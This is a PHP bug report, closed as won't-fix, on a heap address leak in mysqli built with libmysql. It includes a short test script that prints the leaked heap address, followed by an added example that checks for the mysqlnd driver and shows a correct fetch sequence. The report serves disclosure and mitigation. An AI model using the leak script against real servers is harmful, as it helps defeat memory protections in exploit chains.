[2022-01-19 06:42 UTC] stas@php.net
-Type: Security
+Type: Bug
[2022-02-15 14:25 UTC] dharman@php.net
-Status: Open
+Status: Wont fix
-Assigned To:
+Assigned To: dharman
Description:
------------
When PHP is configured with libmysql instead of mysqlnd, there is a possibility to leak an emalloc()ed address via a simple SQL query with bind_result and fetch. This only copies the lower 4 bytes of the address, but since the MSB is fixed as 0x7f, it's reasonable to find a full heap address.

I tested this in WSL + MariaDB 10.5.13 + PHP 8.2.0-dev with a libmysql build.

Test script:
---------------
<?php
$mysqli = new mysqli("127.0.0.1", "test", "%");
$stmt = $mysqli->prepare("select 1");
$stmt->bind_result($a);
$stmt->prepare("select 1");
$stmt->execute();
$stmt->fetch();
echo "$a"; // the lowest 4 bytes of heap structure
if (!($a & (int)0xffffffff00000000)) {
    printf("Failed, try again\n");
    die();
}
printf("Address in heap leaked: 0x7fff%x\n", $a & 0xffffffff);

Expected result:
----------------
Should return 1 or 0

Actual result:
--------------
the lower 4 bytes of (int *)stmt->result.buf[0].val
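As an added example (not the reporter's script and not PHP project code), the two checks an application owner would want after reading this report: whether the running PHP was built against mysqlnd, the default driver the report contrasts with the affected libmysql build, and a fetch helper that keeps each prepare() followed by its own execute(), bind_result() and fetch(), in the order the mysqli documentation prescribes, so bindings are never carried across a second prepare() as in the reporter's script. The host, user and password values are placeholders, and the "select 1" probe is chosen only so the result can be sanity-checked against a known value.

```php
<?php
// Added example for this bug report; not part of the original page or of PHP itself.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// True when PHP uses the mysqlnd driver. mysqlnd registers itself as an
// extension, and its client info string begins with "mysqlnd"; a libmysql build
// reports the libmysqlclient version instead.
function usesMysqlnd(): bool
{
    return extension_loaded('mysqlnd')
        || str_starts_with(mysqli_get_client_info(), 'mysqlnd');
}

// Runs a single-column, single-row query with one prepare(); execute(),
// bind_result() and fetch() all belong to that same prepared statement.
function fetchSingleInt(mysqli $db, string $sql): ?int
{
    $stmt = $db->prepare($sql);
    $stmt->execute();
    // Bind only after execute() and only for this statement: the report shows
    // that a binding made before a later prepare() does not belong to it.
    $stmt->bind_result($value);
    $fetched = $stmt->fetch();
    $stmt->close();
    return $fetched ? $value : null;
}

// Placeholder connection details; replace with your own (hypothetical values).
$db = new mysqli('127.0.0.1', 'app_user', 'app_password', 'app_db');

if (!usesMysqlnd()) {
    fwrite(STDERR, "Warning: PHP is built with libmysql, not mysqlnd.\n");
}

// Sanity check: a well-formed bind/fetch sequence must return the literal 1.
$probe = fetchSingleInt($db, 'SELECT 1');
if ($probe !== 1) {
    throw new RuntimeException("Unexpected fetch result: " . var_export($probe, true));
}
echo "mysqli prepare/bind/fetch sequence OK (value {$probe})\n";
```

The driver check is the useful part operationally: the ticket was closed as "Won't fix", so on a libmysql build the mitigation is to move to mysqlnd rather than wait for a patch, and the probe makes a mismatched bind visible immediately because anything other than the integer 1 aborts the script.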